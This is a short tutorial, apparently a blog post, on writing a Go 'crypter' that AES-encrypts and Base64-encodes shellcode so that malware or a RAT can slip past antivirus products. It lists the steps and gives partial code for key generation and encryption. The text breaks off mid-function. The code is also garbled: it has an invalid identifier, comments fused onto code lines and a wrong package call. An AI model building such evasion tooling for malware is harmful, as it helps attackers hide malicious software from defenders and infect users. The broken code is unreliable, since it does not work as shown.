What is Crypter?
A crypter is a software that can encrypt, obfuscate and manipulate malware or a RAT (Remote Access Tool) tool to potentially bypass security products such as anti-viruses.
Encryption Process
For creating a simple crpyter, I will be using the following process:
- Generate a key with random characters & seed (32 characters hard-coded as of now)
- AES Encrypt #1 — Initialize the state array with the block data using the key
- AES Encrypt #2 — Generate IV (Initialization Vector) using block size + length of shellcode
- AES Encrypt #3 — Run the encryption process using the block and IV
- Base64 encode the results
Decryption Process
- Base64 decode the results
- AES Decrypt #1 — Initialize the state array with the block data using the key
- AES Decrypt #2 — Check if length IV is equal to the block size
- AES Decrypt #3 — Run the decryption process using the block and IV
- Return the decrypted string
I chose Go
programming language to create the crypter.
Generate Key Code
// Random Key Generator (128 bit)var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")func randKeyGen(n int) string {
charSet := make([]rune, n)
for i := range charSet {
charSet[i] = chars[math.Intn(len(chars))]
}
return string(charSet)
}
Encryption Code
// Encrypt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encodefunc Encrypt(key []byte, text []byte) string {
block, err := aes.NewCipher(key)
if err != nil {
panic(err)
} // Creating IV
cipher-text := make([]byte, aes.BlockSize+len(text))
iv := ciphertext[:aes.BlockSize]
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
panic(err)
} // Encrpytion Process
stream := cipher.NewCFBEncrypter(block, iv)
stream.XORKeyStream(ciphertext[aes.BlockSize:], text)